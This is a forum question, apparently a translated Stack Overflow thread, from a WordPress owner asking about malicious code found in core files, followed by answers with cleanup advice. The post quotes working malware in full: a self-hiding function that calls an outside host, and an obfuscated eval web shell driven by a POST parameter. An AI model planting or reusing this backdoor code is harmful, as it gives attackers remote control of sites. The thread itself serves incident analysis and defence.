我刚注意到我的一些wordpress项目在特定位置包含一些随机代码。
例如: wp-includes / meta.php 包含在下面的文件代码底部:
check_meta();
function check_meta(){
$jp = __FILE__;
$jptime = filemtime($jp);
if(time() >= 1456732115){
$jp_c = file_get_contents($jp);
if($t = @strpos($jp_c,"check_meta();")) {
$contentp = substr($jp_c,0,$t);
if(@file_put_contents($jp, $contentp)){
@touch($jp,$jptime);
}
}
}
@file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/ID3/getid.php");
}
另一个位置: wp-includes / ID3 / getid.php 包含以下代码:
<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['ttr6i']) && ($www= $_POST['ttr6i']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>
基本上,我所看到的是 check_meta()方法正在更新 wp-includes / meta.php 文件而不更改它的修改时间。然后, file_get_contents 与一些中文服务器连接,并通过 $ _ GET 传递一些数据。
在第二个文件中,str_rot13(&#39; riny&#39;)等于 eval
以前有人处理过这类问题吗?也许有人可以更多地谈论这段代码。期待您的回音。在这一刻,我将它视为病毒,因为它已经扩散到我的许多项目中。
答案 0 :(得分:3)
永远不要相信你没有包含的不熟悉的代码!诈骗者经常试图让恶意软件看起来无害,就像上面一样。尝试安装WordFence,Sucuri或其他安全插件并运行扫描。
答案 1 :(得分:2)
看起来你的服务器遭到黑客攻击我过去曾经不得不处理类似的问题一两次。是的,黑客似乎专门针对WordPress网站。
无论如何都不应该修改WordPress核心。
更改所有服务器密码(客户中心,FTP,SSH,SQL等)
下载WordPress核心的全新安装并删除旧的
检查您的wp-content文件夹是否存在安全问题,尤其是您的主题和插件(检查是否有任何已修改或不安全的代码)
在wp-config.php中更改安全盐
重新设置WordPress网站后,增加其安全性。有关于如何保护WordPress的各种文章,并且有几个WordPress安全插件可用。扫描您的网站。
如果再次出现类似问题,您还应检查您的网络服务器/虚拟主机的安全设置。